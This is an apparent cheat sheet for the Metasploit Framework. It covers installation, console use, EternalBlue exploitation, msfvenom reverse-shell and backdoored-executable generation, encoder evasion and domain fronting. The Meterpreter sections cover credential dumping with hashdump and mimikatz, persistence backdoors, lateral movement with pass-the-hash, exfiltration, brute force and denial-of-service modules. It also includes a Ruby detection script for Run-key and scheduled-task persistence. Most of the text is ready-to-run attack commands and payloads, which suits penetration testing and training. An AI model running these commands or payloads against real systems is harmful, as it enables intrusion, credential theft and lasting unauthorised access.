
# Metasploit Framework Cheat Sheet


## Overview

The Metasploit Framework is the world's most widely used penetration testing framework, developed by Rapid7. Originally created by H.D. Moore in 2003, Metasploit has become the de facto standard for exploit development, vulnerability validation and penetration testing. The framework provides a complete platform for developing, testing and executing exploit code against remote machines, making it an indispensable tool for security professionals, penetration testers and red team operators.

Metasploit's modular architecture consists of exploits, payloads, encoders, NOPs and auxiliary modules that can be combined in many ways to build sophisticated attack scenarios. The framework supports several interfaces, including the msfconsole command line, the web interface and various APIs for integration with other security tools. With more than 2,000 exploits and 500 payloads, Metasploit offers broad coverage for testing security vulnerabilities across different operating systems, applications and network services.

The framework's strength lies not only in its vast exploit database but also in its payload generation capabilities, post-exploitation modules and evasion techniques. Metasploit lets security professionals simulate real-world attacks, validate security controls and demonstrate the impact of vulnerabilities to stakeholders. Its integration with other security tools and its extensive documentation make it accessible to both beginners and advanced practitioners in cybersecurity.

## Installation

### Kali Linux Installation

Metasploit comes pre-installed on Kali Linux and can be updated using the package manager:

```bash
# Update Metasploit on Kali Linux
sudo apt update
sudo apt install metasploit-framework

# Initialize the database
sudo msfdb init

# Start PostgreSQL service
sudo systemctl start postgresql
sudo systemctl enable postgresql

# Verify installation
msfconsole --version
```

### Ubuntu/Debian Installation

```bash
# Add Rapid7 repository
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

# Alternative: Manual installation
sudo apt update
sudo apt install curl wget gnupg2 software-properties-common apt-transport-https ca-certificates

# Add Rapid7 GPG key
curl -fsSL https://apt.metasploit.com/metasploit-framework.gpg.key | sudo apt-key add -

# Add repository
echo "deb https://apt.metasploit.com/ lucid main" | sudo tee /etc/apt/sources.list.d/metasploit-framework.list

# Install Metasploit
sudo apt update
sudo apt install metasploit-framework

# Initialize database
sudo msfdb init
```

### CentOS/RHEL Installation

```bash
# Install dependencies
sudo yum install curl wget which

# Download and run installer
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall

# Initialize database
sudo msfdb init

# Start PostgreSQL
sudo systemctl start postgresql
sudo systemctl enable postgresql
```

### Docker Installation

```bash
# Pull official Metasploit image
docker pull metasploitframework/metasploit-framework

# Run Metasploit in Docker
docker run --rm -it -v "${HOME}/.msf4:/home/msf/.msf4" metasploitframework/metasploit-framework

# Run with database persistence
docker run --rm -it -v "${HOME}/.msf4:/home/msf/.msf4" -v "${HOME}/msf-db:/opt/metasploit-framework/embedded/var/lib/postgresql" metasploitframework/metasploit-framework

# Create alias for easy access
echo 'alias msfconsole="docker run --rm -it -v \"${HOME}/.msf4:/home/msf/.msf4\" metasploitframework/metasploit-framework"' >> ~/.bashrc
source ~/.bashrc
```

### Windows Installation

```powershell
# Download installer from official website
# https://windows.metasploit.com/metasploitframework-latest.msi

# Install using PowerShell (requires admin privileges)
Start-Process msiexec.exe -Wait -ArgumentList '/I metasploitframework-latest.msi /quiet'

# Verify installation
& "C:\metasploit-framework\bin\msfconsole.bat" --version

# Initialize database (requires PostgreSQL)
& "C:\metasploit-framework\bin\msfdb.bat" init
```

### macOS Installation

```bash
# Install using Homebrew
brew install metasploit

# Alternative: Download installer
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

# Initialize database
msfdb init

# Start PostgreSQL
brew services start postgresql
```

## Basic Usage

### Starting the Metasploit Console

```bash
# Start msfconsole
msfconsole

# Start with specific database
msfconsole -d msf_database

# Start with custom resource script
msfconsole -r /path/to/script.rc

# Start in quiet mode
msfconsole -q

# Start with specific workspace
msfconsole -w workspace_name
```

### Database Management

```bash
# Initialize database
msfdb init

# Check database status
msfdb status

# Start database
msfdb start

# Stop database
msfdb stop

# Restart database
msfdb restart

# Delete database
msfdb delete

# Reinitialize database
msfdb reinit
```

### Basic Console Commands

```bash
# Get help
help
?

# Show version information
version

# Exit console
exit
quit

# Clear screen
clear

# Show banner
banner

# Load resource script
resource /path/to/script.rc

# Save command history
history -S /path/to/history.txt

# Load command history
history -L /path/to/history.txt
```

## Core Commands

### Search and Information

```bash
# Search for exploits
search type:exploit platform:windows
search cve:2017-0144
search name:eternal
search rank:excellent

# Search for payloads
search type:payload platform:windows arch:x64
search type:payload platform:linux format:elf

# Search for auxiliary modules
search type:auxiliary name:scanner

# Search for post-exploitation modules
search type:post platform:windows

# Show module information
info exploit/windows/smb/ms17_010_eternalblue
info payload/windows/x64/meterpreter/reverse_tcp

# Show module options
show options
show advanced
show evasion
show targets
show payloads

# Show available exploits
show exploits

# Show available payloads
show payloads

# Show auxiliary modules
show auxiliary

# Show post-exploitation modules
show post

# Show encoders
show encoders

# Show nops
show nops
```

### Module Selection and Configuration

```bash
# Use a module
use exploit/windows/smb/ms17_010_eternalblue
use auxiliary/scanner/portscan/tcp
use payload/windows/x64/meterpreter/reverse_tcp

# Set module options
set RHOSTS 192.168.1.100
set RHOST 10.0.0.1
set LHOST 192.168.1.50
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Set global options
setg RHOSTS 192.168.1.0/24
setg LHOST 192.168.1.50

# Unset options
unset RHOSTS
unset PAYLOAD

# Unset global options
unsetg RHOSTS

# Show current settings
show options
show advanced

# Get option information
info -d RHOSTS

# Set advanced options
set PrependMigrate true
set PrependMigrateProc explorer.exe
set AutoRunScript post/windows/manage/migrate
```

### Target and Payload Management

```bash
# Show available targets
show targets

# Set specific target
set TARGET 0
set TARGET "Windows 7 SP1 x64"

# Show compatible payloads
show payloads

# Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set PAYLOAD linux/x86/shell/reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp

# Generate payload
generate -f exe -o payload.exe
generate -f elf -o payload.elf
generate -f war -o payload.war

# Show payload options
show options

# Set payload options
set LHOST 192.168.1.50
set LPORT 4444
set EXITFUNC thread
```

## Exploitation Workflow

### Basic Exploitation Process

```bash
# 1. Search for exploit
search ms17-010

# 2. Use exploit module
use exploit/windows/smb/ms17_010_eternalblue

# 3. Show and set options
show options
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50

# 4. Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LPORT 4444

# 5. Check if target is vulnerable
check

# 6. Run the exploit
exploit
run

# 7. Interact with session
sessions -l
sessions -i 1
```

### Advanced Exploitation Techniques

```bash
# Use specific target
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit -j

# Exploit with specific options
exploit -z  # Don't interact with session
exploit -j  # Run as job
exploit -J  # Force running in foreground

# Set advanced evasion options
set PrependMigrate true
set PrependMigrateProc explorer.exe
set AutoRunScript post/windows/manage/migrate

# Use encoders for evasion
set ENCODER x86/shikata_ga_nai
set ITERATIONS 3

# Set custom user agent
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Use custom templates
set TEMPLATE /path/to/template.exe
```

### Multi-Target Exploitation

```bash
# Set multiple targets
set RHOSTS 192.168.1.100-110
set RHOSTS file:/path/to/targets.txt
set RHOSTS 192.168.1.0/24

# Use threading for faster exploitation
set THREADS 10

# Run exploit against all targets
exploit

# Check all targets
check

# Use auxiliary scanner first
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
set THREADS 20
run
```

## Payload Generation

### MSFVenom Payload Generation

```bash
# Generate Windows executables
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe

# Generate Linux executables
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o payload.elf

# Generate macOS executables
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f macho -o payload.macho

# Generate Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o payload.apk

# Generate iOS payload
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f macho -o payload.macho

# Generate web payloads
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o payload.war
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o payload.php
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o payload.asp
```

### Encoded Payloads

```bash
# Encode with shikata_ga_nai
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o encoded_payload.exe

# Multiple encoding iterations
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o heavily_encoded.exe

# Use different encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/alpha_mixed -f exe -o alpha_encoded.exe

# Chain multiple encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -e x86/alpha_mixed -i 5 -f exe -o multi_encoded.exe
```

### Custom Templates and Formats

```bash
# Use custom template
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -x /path/to/template.exe -f exe -o backdoored.exe

# Keep template behavior
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -x /path/to/template.exe -k -f exe -o backdoored.exe

# Generate shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f c
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f python
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f powershell

# Generate different formats
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f dll -o payload.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f msi -o payload.msi
```

### Platform-Specific Payloads

```bash
# Windows payloads
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/x64/vncinject/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o vnc.exe
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o ps.exe

# Linux payloads
msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf -o bind.elf

# Multi-platform payloads
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f jar -o payload.jar
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f py -o payload.py
```

## Session Management

### Basic Session Commands

```bash
# List active sessions
sessions

# List sessions with details
sessions -l

# Interact with session
sessions -i 1

# Kill session
sessions -k 1

# Kill all sessions
sessions -K

# Upgrade shell to meterpreter
sessions -u 1

# Run command on session
sessions -c "whoami" -i 1

# Run script on session
sessions -s /path/to/script.rb -i 1
```

### Session Interaction

```bash
# Background current session
background
bg

# Return to session
sessions -i 1

# Run local command
!ls
!pwd
!cat /etc/passwd

# Upload file to session
upload /local/file.txt C:\\Windows\\Temp\\file.txt

# Download file from session
download C:\\Windows\\System32\\drivers\\etc\\hosts /tmp/hosts

# Execute command
execute -f cmd.exe -a "/c whoami"
execute -f powershell.exe -a "-Command Get-Process"

# Get system information
sysinfo
getuid
getpid
```

### Advanced Session Management

```bash
# Route traffic through session
route add 10.0.0.0/24 1
route print
route delete 10.0.0.0/24

# Port forwarding
portfwd add -l 8080 -p 80 -r 192.168.1.100
portfwd list
portfwd delete -l 8080

# Pivot through session
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j

# Auto-route through session
use post/multi/manage/autoroute
set SESSION 1
run
```

## Meterpreter Commands

### System Information

```bash
# Get system information
sysinfo
getuid
getpid
ps

# Get environment variables
getenv
getenv PATH
getenv COMPUTERNAME

# Get network configuration
ipconfig
ifconfig
route

# Get system privileges
getprivs

# Attempt to elevate to SYSTEM
getsystem

# Get current directory
pwd
getwd

# List drives
show_mount
```

### File System Operations

```bash
# Navigate file system
cd C:\\Windows
cd /etc
ls
dir

# Search for files
search -f *.txt
search -f config.* -d C:\\
search -f passwd -d /etc

# Download files
download C:\\Windows\\System32\\config\\SAM /tmp/SAM
download /etc/passwd /tmp/passwd

# Upload files
upload /tmp/payload.exe C:\\Windows\\Temp\\payload.exe
upload /tmp/script.sh /tmp/script.sh

# Edit files
edit C:\\Windows\\Temp\\file.txt
edit /tmp/file.txt

# Delete files
rm C:\\Windows\\Temp\\file.txt
del /tmp/file.txt

# Create directories
mkdir C:\\Windows\\Temp\\test
mkdir /tmp/test
```

### Process Management

```bash
# List processes
ps

# Get detailed process information
ps -A
ps -S

# Kill process
kill 1234

# Migrate to process
migrate 1234
migrate explorer.exe

# Execute programs
execute -f cmd.exe
execute -f powershell.exe -a "-Command Get-Process"
execute -f /bin/bash -a "-c 'id'"

# Run as different user
execute -f cmd.exe -u username -p password

# Create process
execute -f notepad.exe -H
```

### Network Operations

```bash
# Show network connections
netstat
netstat -an

# ARP table
arp

# Network interfaces
ipconfig
ifconfig

# Port forwarding
portfwd add -l 3389 -p 3389 -r 192.168.1.100
portfwd list
portfwd delete -l 3389

# Reverse port forwarding
portfwd add -R -l 8080 -p 80 -r 127.0.0.1

# SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j
```

### Registry Operations (Windows)

```bash
# Enumerate registry keys
reg enumkey -k HKLM\\Software
reg enumkey -k HKCU\\Software

# Query registry values
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion -v ProductName
reg queryval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

# Set registry values
reg setval -k HKLM\\Software\\Test -v TestValue -t REG_SZ -d "Test Data"

# Delete registry values
reg deleteval -k HKLM\\Software\\Test -v TestValue

# Delete registry keys
reg deletekey -k HKLM\\Software\\Test
```

### Credential Operations

```bash
# Dump hashes
hashdump

# Load mimikatz
load mimikatz
wdigest
msv
ssp
tspkg
kerberos

# Load kiwi (newer mimikatz)
load kiwi
creds_all
creds_wdigest
creds_msv
creds_ssp
creds_tspkg
creds_kerberos

# Golden ticket
golden_ticket_create -u Administrator -d domain.com -s S-1-5-21-... -k aes256_key

# Silver ticket
kerberos_ticket_use /path/to/ticket.kirbi
```

### Persistence

```bash
# Create persistent backdoor
use exploit/windows/local/persistence
set SESSION 1
set STARTUP SYSTEM
run

# Registry persistence
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Backdoor -t REG_SZ -d "C:\\Windows\\Temp\\backdoor.exe"

# Service persistence
use post/windows/manage/persistence_exe
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run

# Scheduled task persistence
execute -f schtasks.exe -a "/create /tn Backdoor /tr C:\\Windows\\Temp\\backdoor.exe /sc onlogon"
```

## Post-Exploitation Modules

### Information Gathering

```bash
# System enumeration
use post/windows/gather/enum_system
use post/linux/gather/enum_system
set SESSION 1
run

# Network enumeration
use post/windows/gather/enum_domain
use post/windows/gather/enum_shares
use post/linux/gather/enum_network
set SESSION 1
run

# Credential gathering
use post/windows/gather/credentials/credential_collector
use post/windows/gather/smart_hashdump
use post/linux/gather/hashdump
set SESSION 1
run

# Application enumeration
use post/windows/gather/enum_applications
use post/windows/gather/enum_chrome
use post/windows/gather/enum_firefox
set SESSION 1
run

# File enumeration
use post/windows/gather/enum_files
use post/multi/gather/find_files
set SESSION 1
set SEARCH_FROM C:\\
set FILE_GLOBS *.txt,*.doc,*.pdf
run
```

### Privilege Escalation

```bash
# Windows privilege escalation
use post/windows/escalate/getsystem
use post/windows/escalate/bypassuac
use post/windows/escalate/bypassuac_injection
set SESSION 1
run

# Linux privilege escalation
use post/linux/escalate/cve_2021_4034
use post/linux/escalate/sudo_baron_samedit
set SESSION 1
run

# Suggest privilege escalation
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

# UAC bypass
use exploit/windows/local/bypassuac_comhijack
use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
run
```

### Lateral Movement

```bash
# Pass the hash
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.100
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
run

# WMI execution
use exploit/windows/local/wmi
set SESSION 1
set RHOSTS 192.168.1.100
run

# PowerShell remoting
use exploit/windows/local/powershell_remoting
set SESSION 1
set RHOSTS 192.168.1.100
run

# SSH lateral movement
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.0/24
set USERNAME root
set PASSWORD password
run
```

### Data Exfiltration

```bash
# File collection
use post/multi/gather/find_files
set SESSION 1
set SEARCH_FROM C:\\Users
set FILE_GLOBS *.doc,*.pdf,*.txt,*.xls
run

# Browser data
use post/windows/gather/enum_chrome
use post/windows/gather/enum_firefox
use post/windows/gather/enum_ie
set SESSION 1
run

# Email data
use post/windows/gather/outlook
use post/windows/gather/thunderbird_creds
set SESSION 1
run

# Database enumeration
use auxiliary/admin/mssql/mssql_enum
use auxiliary/admin/mysql/mysql_enum
set SESSION 1
run
```

### Persistence and Backdoors

```bash
# Registry persistence
use post/windows/manage/persistence_exe
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
set STARTUP SYSTEM
run

# Service persistence
use post/windows/manage/persistence
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run

# Scheduled task
use post/windows/manage/schtask
set SESSION 1
set TASKNAME Backdoor
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run

# WMI persistence
use post/windows/manage/wmi_persistence
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run
```
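
The persistence techniques listed in the Meterpreter "Persistence" section and in "Persistence and Backdoors" above (a Run key value and a logon-triggered scheduled task, both pointing at an executable under `C:\Windows\Temp`) leave the same two artifacts on every host, which is what a defender looks for. The following Ruby script is an added example, not part of the original cheat sheet or of Metasploit: it runs a detection rule over constructed, Sysmon-style registry and process-creation events (the field names and sample values are assumptions, not real telemetry) and flags autoruns whose target lives in a temporary or user-writable directory.

```ruby
# Added example: detect Run-key and schtasks persistence pointing into
# temp/user-writable directories. Events are constructed sample records
# modelled on Sysmon RegistryEvent (ID 13) and ProcessCreate (ID 1);
# they are not real logs.
SAMPLE_EVENTS = [
  { id: 13, image: 'C:\Windows\System32\reg.exe',
    target: 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor',
    details: 'C:\Windows\Temp\backdoor.exe' },
  { id: 13, image: 'C:\Program Files\Vendor\setup.exe',
    target: 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater',
    details: 'C:\Program Files\Vendor\updater.exe' },
  { id: 1, image: 'C:\Windows\System32\schtasks.exe',
    command_line: 'schtasks.exe /create /tn Backdoor /tr C:\Windows\Temp\backdoor.exe /sc onlogon' },
  { id: 1, image: 'C:\Windows\System32\schtasks.exe',
    command_line: 'schtasks.exe /query /tn Backup' }
].freeze

# Autorun registry locations (Run and RunOnce under HKLM or HKCU).
RUN_KEY = /\\CurrentVersion\\(Run|RunOnce)\\/i
# Directories a legitimately installed autorun rarely lives in.
SUSPICIOUS_DIRS = [
  /\\Windows\\Temp\\/i,
  /\\AppData\\Local\\Temp\\/i,
  /\\Users\\Public\\/i,
  /\\ProgramData\\/i
].freeze
# schtasks triggers that fire without user interaction.
LOGON_TRIGGER = %r{/sc\s+(onlogon|onstart)\b}i

def suspicious_path?(path)
  SUSPICIOUS_DIRS.any? { |re| path.to_s =~ re }
end

# Walk the events and return one alert hash per match.
def detect_persistence(events)
  alerts = []
  events.each_with_index do |ev, idx|
    case ev[:id]
    when 13 # registry value set
      next unless ev[:target] =~ RUN_KEY && suspicious_path?(ev[:details])
      alerts << { event: idx, rule: 'run_key_to_temp',
                  value: ev[:target], payload: ev[:details] }
    when 1 # process created
      cl = ev[:command_line].to_s
      next unless ev[:image] =~ /\\schtasks\.exe\z/i && cl =~ %r{/create\b}i
      task_run = cl[%r{/tr\s+(\S+)}i, 1]
      next unless cl =~ LOGON_TRIGGER && task_run && suspicious_path?(task_run)
      alerts << { event: idx, rule: 'schtasks_logon_from_temp',
                  value: cl[%r{/tn\s+(\S+)}i, 1], payload: task_run }
    end
  end
  alerts
end

if __FILE__ == $PROGRAM_NAME
  detect_persistence(SAMPLE_EVENTS).each do |a|
    puts "[#{a[:rule]}] event ##{a[:event]}: #{a[:value]} -> #{a[:payload]}"
  end
end
```

The vendor installer in the sample writes a Run value too, but into `Program Files`, so it is not flagged; the rule keys on the combination of an autorun location and an untrusted target directory rather than on the registry write alone. Real Sysmon exports would be parsed into the same hashes before calling `detect_persistence`.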

## Auxiliary Modules

### Scanners

```bash
# Port scanning
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 21,22,23,25,53,80,110,443,993,995
set THREADS 20
run

# Service version detection
use auxiliary/scanner/http/http_version
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.0/24
set THREADS 10
run

# SMB enumeration
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
set RHOSTS 192.168.1.0/24
run

# Web application scanning
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/files_dir
use auxiliary/scanner/http/http_put
set RHOSTS 192.168.1.100
set THREADS 10
run
```

### Brute Force Attacks

```bash
# SSH brute force
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
set THREADS 10
run

# FTP brute force
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run

# HTTP basic auth brute force
use auxiliary/scanner/http/http_login
set RHOSTS 192.168.1.100
set AUTH_URI /admin
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run

# SMB brute force
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run
```

### Denial of Service

```bash
# TCP SYN flood
use auxiliary/dos/tcp/synflood
set RHOST 192.168.1.100
set RPORT 80
set THREADS 10
run

# HTTP slowloris
use auxiliary/dos/http/slowloris
set RHOST 192.168.1.100
set RPORT 80
run

# SMB DoS
use auxiliary/dos/windows/smb/ms09_001_write
set RHOST 192.168.1.100
run

# WiFi deauth
use auxiliary/dos/wifi/deauth
set INTERFACE wlan0
set BSSID 00:11:22:33:44:55
run
```

### SNMP Enumeration

```bash
# SNMP community scanner
use auxiliary/scanner/snmp/snmp_login
set RHOSTS 192.168.1.0/24
run

# SNMP enumeration
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 192.168.1.100
set COMMUNITY public
run

# SNMP user enumeration
use auxiliary/scanner/snmp/snmp_enumusers
set RHOSTS 192.168.1.100
run

# SNMP process enumeration
use auxiliary/scanner/snmp/snmp_enumprocesses
set RHOSTS 192.168.1.100
run
```

## Database Integration

### Workspace Management

```bash
# List workspaces
workspace

# Create workspace
workspace -a project_name

# Switch workspace
workspace project_name

# Delete workspace
workspace -d project_name

# Rename workspace
workspace -r old_name new_name

# Show current workspace
workspace -v
```

### Host and Service Management

```bash
# Add hosts
db_import /path/to/nmap_scan.xml
hosts

# Add host manually
hosts -a 192.168.1.100 -n target1 -o "Windows 10"

# Show hosts
hosts
hosts -c address,name,os_name

# Search hosts
hosts 192.168.1.0/24
hosts -S windows

# Delete hosts
hosts -d 192.168.1.100

# Add services
services -a -p 80 -s http -h 192.168.1.100

# Show services
services
services -p 80
services -s http

# Delete services
services -d -p 80 -h 192.168.1.100
```

### Vulnerability Management

```bash
# Show vulnerabilities
vulns

# Add vulnerability
vulns -a -h 192.168.1.100 -n "MS17-010" -r "CVE-2017-0144"

# Search vulnerabilities
vulns -S ms17-010

# Show vulnerability details
vulns -v

# Export vulnerabilities
vulns -O /tmp/vulns.xml
```

### Credential Management

```bash
# Show credentials
creds

# Add credentials
creds -a -h 192.168.1.100 -u administrator -p password123 -t password

# Search credentials
creds -S administrator

# Show credential details
creds -v

# Export credentials
creds -O /tmp/creds.csv
```

### Loot Management

```bash
# Show loot
loot

# Add loot
loot -a -h 192.168.1.100 -t "password_file" -f /tmp/passwords.txt

# Search loot
loot -S password

# Export loot
loot -O /tmp/loot.xml
```

## Advanced Techniques

### Custom Module Development

```ruby
# Basic exploit module template
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Custom Exploit',
      'Description'    => 'Custom exploit description',
      'Author'         => ['Your Name'],
      'License'        => MSF_LICENSE,
      'References'     => [['CVE', '2021-1234']],
      'Platform'       => 'win',
      'Targets'        => [['Windows Universal', {}]],
      'Payload'        => {
        'Space'    => 400,
        'BadChars' => "\x00\x0a\x0d"
      },
      'DisclosureDate' => '2021-01-01',
      'DefaultTarget'  => 0))

    register_options([
      Opt::RPORT(9999)
    ])
  end

  def check
    # Vulnerability check logic: return Safe/Detected/Appears/Vulnerable
    # based on what the target reports; this template always claims Vulnerable
    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    # Exploitation logic
    connect
    print_status("Sending payload...")
    sock.put(payload.encoded)
    handler
    disconnect
  end
end
```

### Custom Payload Development

```ruby
# Basic payload module template
require 'msf/core'

module MetasploitModule
  CachedSize = 200

  include Msf::Payload::Single
  include Msf::Payload::Windows
  include Msf::Payload::Windows::Exec

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Custom Windows Payload',
      'Description'   => 'Custom payload description',
      'Author'        => ['Your Name'],
      'License'       => MSF_LICENSE,
      'Platform'      => 'win',
      'Arch'          => ARCH_X86))

    register_options([
      OptString.new('CMD', [true, "Command to execute", 'calc.exe'])
    ])
  end

  def generate
    # Payload generation logic: build the shellcode for the configured command
    cmd = datastore['CMD'] || 'calc.exe'
    # Return the shellcode bytes here (left as a stub in this template)
  end
end
```

### Evasion Techniques

```bash
# Use encoders
set ENCODER x86/shikata_ga_nai
set ITERATIONS 5

# Use custom templates
set TEMPLATE /path/to/legitimate.exe

# Modify payload behavior
set PrependMigrate true
set PrependMigrateProc explorer.exe

# Use HTTPS for C2
set LHOST 192.168.1.50
set LPORT 443
set HttpsUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Domain fronting
set HttpHostHeader legitimate-domain.com
set LHOST cdn-provider.com

# Custom user agents
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"

# Sleep and jitter
set WfsDelay 30
set Jitter 25
```

### Automation and Scripting

```bash
# Resource scripts
echo "use exploit/multi/handler" > handler.rc
echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> handler.rc
echo "set LHOST 192.168.1.50" >> handler.rc
echo "set LPORT 4444" >> handler.rc
echo "exploit -j" >> handler.rc

# Load resource script
msfconsole -r handler.rc
```

```ruby
# Ruby scripting (from the msfconsole irb prompt)
irb
framework = Msf::Simple::Framework.create
session = framework.sessions[1]
session.shell_command("whoami")
```

```ruby
# Automation script
#!/usr/bin/env ruby
require 'msf/core'
require 'msf/base'

framework = Msf::Simple::Framework.create
exploit = framework.exploits.create('windows/smb/ms17_010_eternalblue')
exploit.datastore['RHOSTS'] = '192.168.1.100'
exploit.datastore['PAYLOAD'] = 'windows/x64/meterpreter/reverse_tcp'
exploit.datastore['LHOST'] = '192.168.1.50'
exploit.datastore['LPORT'] = '4444'
exploit.exploit_simple('Payload' => exploit.datastore['PAYLOAD'])
```

## Integration with Other Tools

### Nmap Integration

```bash
# Import Nmap results
db_import /path/to/nmap_scan.xml

# Use Nmap from within Metasploit
db_nmap -sS -O 192.168.1.0/24
db_nmap -sV -p 1-1000 192.168.1.100

# Automated exploitation based on Nmap results
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run

# Use discovered services
hosts -c address,name,os_name
services -c port,proto,name,state
```

### Burp Suite Integration

```bash
# Configure Burp proxy
set Proxies http:127.0.0.1:8080

# Use Burp findings
use auxiliary/scanner/http/dir_scanner
set RHOSTS target.com
set DICTIONARY /path/to/burp_discovered_dirs.txt
run

# Export session for Burp
sessions -l
sessions -C "netstat -an" -i 1 > network_connections.txt
```

### Cobalt Strike Integration

```bash
# Generate Cobalt Strike compatible payload
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.1.50 LPORT=80 -f raw | base64

# Use Cobalt Strike beacon
use exploit/multi/handler
